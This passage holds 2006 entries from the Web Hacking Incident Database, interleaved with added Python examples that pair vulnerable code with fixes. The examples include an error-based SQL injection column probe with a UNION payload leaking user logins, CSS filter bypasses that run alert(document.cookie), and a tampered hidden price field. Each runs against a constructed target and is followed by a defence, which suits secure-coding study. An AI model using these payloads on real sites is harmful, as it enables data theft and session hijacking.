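    return sum(Decimal(item["price"]) * int(item["qty"]) for item in form["items"])


def total_safe(form):
    """Ignores client-supplied prices and re-prices every line from the catalogue."""
    total = Decimal("0")
    for item in form["items"]:
        sku = item["sku"]
        qty = int(item["qty"])
        if sku not in CATALOG:
            raise ValueError(f"unknown SKU {sku!r}")
        if qty <= 0:
            raise ValueError(f"bad quantity for {sku}")
        total += CATALOG[sku] * qty
    return total


def sign_hidden_field(payload: dict) -> str:
    """When state must round-trip through the client, bind it to an HMAC tag."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    tag = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_hidden_field(field: str):
    """Returns the payload if the tag matches, None if the field was tampered with."""
    body, _, tag = field.rpartition(".")
    expected = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


# Constructed order: the attacker edited the hidden price field from 120.00 to 0.01.
TAMPERED_FORM = {"items": [{"sku": "SKU-1001", "qty": 2, "price": "0.01"}]}

if __name__ == "__main__":
    print("vulnerable total:", total_vulnerable(TAMPERED_FORM))
    print("re-priced total: ", total_safe(TAMPERED_FORM))
    signed = sign_hidden_field({"sku": "SKU-1001", "price": "120.00"})
    tampered = signed.replace("120.00", "0.01")
    print("tampered signed field accepted:", verify_hidden_field(tampered) is not None)
```

The first fix is the one to prefer: if the server already knows the price there is no reason for the client to carry it. The signed field is for data the server genuinely cannot reconstruct (a quoted shipping rate, a negotiated discount); the tag must be checked with a constant-time comparison, as above, and the key must stay on the server.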

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-42: Netscape.com hacked
WHID ID: 2006-42
Date Occured: 7/27/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Many reported XSS vulnerabilities are never exploited, and some are hardly exploitable in practice. In this case, however, Netscape's new Digg-like shared-news site was hacked using a persistent (stored) XSS attack, so every viewer of the site ran the injected script, luckily only to be shown joke dialog boxes.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-41: Making money with MySpace bulletin system!
WHID ID: 2006-41
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Abuse of Functionality
Outcome: Worm
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A bug in MySpace allowed a single click on an incoming bulletin to forward it to all of the recipient's contacts, making it far too easy to spread a worm (or any other content, for that matter).

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-40: Data Mining MySpace Bulletins
WHID ID: 2006-40
Date Occured: 7/24/2006
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

MySpace bulletins, presumably accessible only to the originator's social network, can be accessed by anyone by iterating through a message id query parameter.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-39: Another Google XSS
WHID ID: 2006-39
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS vulnerability in the feature that allows adding an arbitrary RSS feed to a personalized Google page. Since this page resides on the main www.google.com host, the executed JavaScript runs in that origin and can access any Google resource served from it.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-38: Convenience or just bad design?
WHID ID: 2006-38
Date Occured: 7/24/2006
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Altiris seems to have designed its servers so that it is easy both to access its customers' uploads and to find out their e-mail addresses.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-37: MySpace Hack Spreading
WHID ID: 2006-37
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

MySpace seems to be a haven for XSS worms. This one is even more interesting as it uses JavaScript embedded in a Flash file. It is also interesting in that it combines the popular political defacement trend with a high-level application-layer exploit.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-36: PayPal Flaw Gets Accidental Two-Year Reprieve?
WHID ID: 2006-36
Date Occured: 7/24/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While XSS vulnerabilities in public web sites are found daily, this one is of special interest. It was found in one of the sites most targeted by phishers, it is exploitable for phishing, and it was exploited. On top of that, it seems to have been discovered and reported to PayPal two years earlier but ignored due to a communication failure.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-35: Yahoo mail XSS in CSS expression keyword
WHID ID: 2006-35
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Yahoo Mail does not properly filter the CSS "expression" keyword when it contains an encoded comment.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-34: XSS Exploit at sms.ac
WHID ID: 2006-34
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

This community site allows including scripts in multiple locations, including one's personal profile, thus enabling XSS.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-33: Alexadex.com players.py XSS Exploit
WHID ID: 2006-33
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Alexadex is an online investment game. There is an XSS vulnerability in the group adding functionality.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-32: libero.it XSS vulnerability - HTML injection
WHID ID: 2006-32
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Libero.it is the web portal of a large Italian ISP offering dial-up, broadband and voice services. A script on its customer service pages that provides a connection speed test is vulnerable to XSS.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-31: URL Bug On 1ASPHost and DomainDLX Hosting Services
WHID ID: 2006-31
Date Occured: 5/9/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A researcher found that the login error page on these sites can be injected with script.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-30: National Secret Agency of Slovak Republic Hacked
WHID ID: 2006-30
Date Occured: 4/30/2006
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A hacker successfully abused a vulnerability in Horde to penetrate a site owned by the National Security Agency of the Slovak Republic.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-28: Tlen.PL e-mail XSS vulnerability
WHID ID: 2006-28
Date Occured: 4/20/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Tlen.PL is a popular Polish IM system provided by o2.pl, which includes e-mail accounts. The e-mail client is web based, with a browser embedded in the communicator software. Certain webmail servers do not validate the e-mail subject for HTML tags, allowing an attacker to inject script code.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-27: SQL Injection in incredibleindia.org
WHID ID: 2006-27
Date Occured: 4/20/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

www.incredibleindia.org is the official Indian government tourism website.

The researcher found that the PageID parameter of the page ms_Page.asp is vulnerable to SQL injection. He further verified that the SQL error messages returned by the application make the standard probing methods for finding the number of columns and their types work.
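
The entry names the vulnerable parameter and the fact that error messages make column-count probing work, but not the application's code. The block below is an added example, not code from incredibleindia.org or from the researcher, built on a constructed in-memory SQLite database: a handler that pastes `PageID` into the SQL text, the error-based ORDER BY probe that such handlers make possible, a UNION that uses the discovered width to pull rows from another table, and the parameterised handler that closes the hole. Table and column names are invented for the demonstration.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory database standing in for the site's back end."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome to the demo site');
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'sha1$deadbeef');
    """)
    return conn


def fetch_page_vulnerable(conn, page_id: str):
    """String concatenation: PageID lands unquoted inside the SQL text."""
    sql = f"SELECT title, body FROM pages WHERE id = {page_id}"
    return conn.execute(sql).fetchall()


def fetch_page_safe(conn, page_id: str):
    """Validate the type, then bind the value; the SQL text never changes."""
    if not page_id.isdigit():
        raise ValueError("PageID must be a positive integer")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(page_id),)
    ).fetchall()


def probe_column_count(query, max_columns=16):
    """Error-based probe: 'ORDER BY n' raises once n exceeds the column count,
    and a verbose error page tells the attacker exactly that."""
    for n in range(1, max_columns + 1):
        try:
            query(f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def run_demo():
    conn = build_demo_db()
    vulnerable = lambda p: fetch_page_vulnerable(conn, p)
    columns = probe_column_count(vulnerable)
    # Pad the UNION with NULLs so it matches the width just discovered.
    payload = "1 UNION SELECT login" + ", NULL" * (columns - 1) + " FROM users"
    leaked = vulnerable(payload)
    try:
        fetch_page_safe(conn, payload)
        safe_rejected = False
    except ValueError:
        safe_rejected = True
    return {
        "columns": columns,
        "leaked": leaked,
        "safe_rejected": safe_rejected,
        "safe_result": fetch_page_safe(conn, "1"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Two things stop the attack in `fetch_page_safe`: the type check rejects anything that is not a bare integer, and the bound parameter means that even a value that slips past validation is data, never SQL. Suppressing the verbose error page is worth doing too, but on its own it only slows the probe down (blind techniques still work); it does not fix the injection.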

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-26: Yahoo XSS used for phishing
WHID ID: 2006-26
Date Occured: 4/18/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS vulnerability in Yahoo Mail is actively exploited for targeted phishing.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-25: Everyone.net XSS
WHID ID: 2006-25
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Everyone.net's login script (loginuser.pl) is prone to cross-site scripting via the loginName variable.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-24: Hotmail XSS (2)
WHID ID: 2006-24
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The $a variable in Hotmail's inbox is vulnerable to cross-site scripting. The exploit requires the victim to open the e-mail message.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-23: ICQ search vulnerable to XSS
WHID ID: 2006-23
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

ICQ.com's search script (search_result.php) is vulnerable to cross-site scripting. The problem is due to the application's failure to properly sanitize user input; the input can be passed to the vulnerable script in two variables (gender and home_country_code).

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-22: SQL injection in a banking application
WHID ID: 2006-22
Date Occured: 4/12/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A CIO of a bank in Singapore reports that many application-layer vulnerabilities, including SQL injection, were discovered in a banking application they had purchased, before it was put into production.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-21: Sourceforge.net XSS (1)
WHID ID: 2006-21
Date Occured: 4/12/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Sourceforge download pages are vulnerable to XSS.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-20: Sourceforge.net XSS (2)
WHID ID: 2006-20
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Sourceforge forums search is vulnerable to XSS.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-19: Google XSS
WHID ID: 2006-19
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Yet another Google XSS. This time it hits the Arabic variant of the main search site; the language selector parameter seems to be what enables the attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-18: Myspace.com - Intricate Script Injection Vulnerability
WHID ID: 2006-18
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Forget putting <script> tags in input fields. This high-tech vulnerability exploits the code handling online/offline flags by inserting a malicious online/offline flag. Awesome.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-17: Mass defacement using XSS at Israblog
WHID ID: 2006-17
Date Occured: 4/10/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Israblog is a large Israeli blogging site. A hacker used XSS to hijack bloggers' sessions and deface their blogs. The defacement was used to inform the world that Israblog's lead developer is a bad programmer.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-16: AstraTel customer call records leaked
WHID ID: 2006-16
Date Occured: 4/10/2006
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A security hole in Sydney internet provider Astratel's LiveBilling online account management system has seriously compromised its customers' privacy.

The service redirected users to a different server and propagated the user information in a hidden field without re-authenticating.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-15: eBay contains a cross-site scripting vulnerability
WHID ID: 2006-15
Date Occured: 4/4/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

eBay contains a cross-site scripting vulnerability. When an eBay user posts an auction, eBay allows SCRIPT tags to be included in the auction description, which creates a cross-site scripting vulnerability in the eBay website.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-14: Forgotten password clues create hacker risk
WHID ID: 2006-14
Date Occured: 4/4/2006
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A UK security consulting firm reports that 54 of the UK sites it surveyed have flaws in their "forgotten password" feature.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-13: Hackers Tap Banks' Web Sites In Unique Phishing Attack
WHID ID: 2006-13
Date Occured: 4/4/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

In this very interesting attack a hacker broke into the informational web sites of several smaller banks in Florida. He then changed the link on the informational pages that points to the outsourced transactional web site so that it pointed to his own phishing site.
While the vulnerability that enabled the hacker to penetrate the informational sites is not known, this is a very interesting example of a targeted web attack. It highlights the importance of protecting every web site, not just the one carrying the core business logic.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-12: Music Web Site: Breach Exposed Accounts
WHID ID: 2006-12
Date Occured: 3/22/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A musical instrument and sound gear Web site that advertises its relationship with artists such as Dave Matthews, Carlos Santana and Mary J. Blige was breached and notified some customers that their credit card information may have been stolen.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-11: Teenager claims to find code flaw in Gmail
WHID ID: 2006-11
Date Occured: 3/5/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A 14-year-old claims to have discovered an XSS flaw in Google's Gmail. Comments have been mixed and Google did not comment, so either the flaw was fixed pretty fast or it did not exist.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-10: NUJP website defacement seen not related to political crisis
WHID ID: 2006-10
Date Occured: 3/5/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A mass defacement of a Philippine hosting service was carried out using SQL injection. It incidentally also defaced the site of the National Union of Journalists of the Philippines, which led some to believe that it was a targeted political attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-9: EBay XSS
WHID ID: 2006-9
Date Occured: 3/3/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disinformation
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Unlike other XSS cases, this was discovered due to actual abuse on a specific auction at EBay.

Additional information:

  • Ebay XSS [Full Disclosure, Feb 28 2006]

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-8: ICQmail.com - Mail2World.com XSS vulnerability
WHID ID: 2006-8
Date Occured: 3/5/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Links sent to a user as part of the mail content are not properly sanitized, so a user receiving such mail and activating a link would be affected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-7: Google Reader "preview" and "lens" script improper feed validation
WHID ID: 2006-7
Date Occured: 3/5/2006
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Google Reader allows redirection, so sites can fool users into subscribing to malicious content.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-6: Hacker breaks into Buffalo sports site
WHID ID: 2006-6
Date Occured: 3/22/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The site of a minor league baseball team was hacked and personal details of fans were stolen.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-5: Hotmail XSS (1)
WHID ID: 2006-5
Date Occured: 3/29/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Hotmail's filtering engine insufficiently filters JavaScript. It is possible to write JavaScript in the BGCOLOR attribute of the BODY tag, using CSS, which leads to execution when the e-mail is viewed. The JavaScript must be Unicode encoded in order to fool the filter; this encoding is recognized by IE 6 and later.
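
This entry and WHID 2006-35 (Yahoo Mail's CSS "expression" filter) describe the same class of failure: a blacklist that looks for a literal keyword in the style text, while the browser's CSS parser first strips comments and decodes escapes, so the keyword can be split or encoded past the filter and reassembled on the client. The block below is an added example, not code from either webmail service; it shows a naive filter of that kind, two constructed bypasses (a comment split, and a CSS hex escape standing in for the encoding trick described above), and an allowlist that normalises the style the way a parser would before deciding what to keep. The property allowlist and value patterns are illustrative choices.

```python
import re


def naive_css_filter(style: str) -> str:
    """Blacklist of the kind these webmail bugs defeated: removes the literal
    keyword and nothing else."""
    return re.sub(r"expression", "", style, flags=re.IGNORECASE)


# What the browser's CSS parser does before interpreting a value: comments are
# dropped and backslash-hex escapes (optionally followed by one space) decoded.
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?")


def css_normalize(style: str) -> str:
    style = _CSS_COMMENT.sub("", style)
    return _CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), style)


def browser_sees_expression(style: str) -> bool:
    """True if a legacy IE engine would find a dynamic property in this style."""
    return "expression(" in css_normalize(style).lower()


# Allowlist alternative: normalise first, then keep only known properties whose
# values match a strict pattern. Function-call syntax never matches.
_COLOR = r"^(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{3,20})$"
_ALLOWED = {
    "color": re.compile(_COLOR),
    "background-color": re.compile(_COLOR),
    "font-size": re.compile(r"^\d{1,2}(px|pt|em)$"),
}


def allowlist_css(style: str) -> str:
    kept = []
    for decl in css_normalize(style).split(";"):
        if ":" not in decl:
            continue
        prop, value = (part.strip().lower() for part in decl.split(":", 1))
        pattern = _ALLOWED.get(prop)
        if pattern and pattern.fullmatch(value):
            kept.append(f"{prop}: {value}")
    return "; ".join(kept)


# Constructed payloads: a comment split, and the CSS escape \72 (the letter r).
BYPASS_COMMENT = "width: exp/* */ression(alert(document.cookie))"
BYPASS_ESCAPE = "width: exp\\72 ession(alert(document.cookie))"
BENIGN = "color: #FF0000; font-size: 12px"

if __name__ == "__main__":
    for payload in (BYPASS_COMMENT, BYPASS_ESCAPE):
        filtered = naive_css_filter(payload)
        print(f"naive filter left {filtered!r}; browser executes: "
              f"{browser_sees_expression(filtered)}")
    print("allowlist keeps:", repr(allowlist_css(BYPASS_COMMENT)), repr(allowlist_css(BENIGN)))
```

The order of operations is the whole point: a filter that decides before it normalises is checking a different string from the one the browser will run. Normalising and then allowlisting is robust against encodings the filter author never thought of, because anything unrecognised is dropped rather than searched for.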

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-4: Hacker diverts traffic from city's Web page
WHID ID: 2006-4
Date Occured: 2/26/2006
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A hosting provider was broken into by brute-forcing passwords on a management interface. The sites of many clients, including three municipalities, were defaced.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-3: Russian hackers broke into a RI GOV website
WHID ID: 2006-3
Date Occured: 2/26/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Russian hackers broke into a Rhode Island government web site and allegedly stole credit card data from individuals who had done business online with state agencies. The hackers claimed to have stolen 53,000 credit card numbers, while the hosting service provider claims the number was just 4,113.

The technical reference site is in Russian; you can use Applied Languages Solutions for an online translation.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-2: GSA takes down eOffer after finding security flaw
WHID ID: 2006-2
Date Occured: 2/26/2006
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Documents uploaded to a GSA site were accessible using a predictable sequential identifier, without requiring special permissions. The documents were available both for viewing and for modification. The site had been in service for more than 18 months before the vulnerability was discovered.
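
This entry and WHID 2006-40 (MySpace bulletins read by iterating a message id) are the same weakness: a record is fetched by a sequential identifier and the application never asks whether the requester is entitled to it. The block below is an added example, not code from GSA, MySpace or WHID. It shows the vulnerable lookup and the enumeration it permits, a lookup that authorises on every access and gives the same answer for "does not exist" and "not yours" (so the id space cannot be mapped from the error), and a second layer that hands out unguessable handles instead of sequence numbers. The records and user names are constructed.

```python
import secrets

# Constructed records: who wrote each bulletin and who is allowed to read it.
BULLETINS = {
    101: {"author": "alice", "audience": {"bob", "carol"}, "text": "party at nine"},
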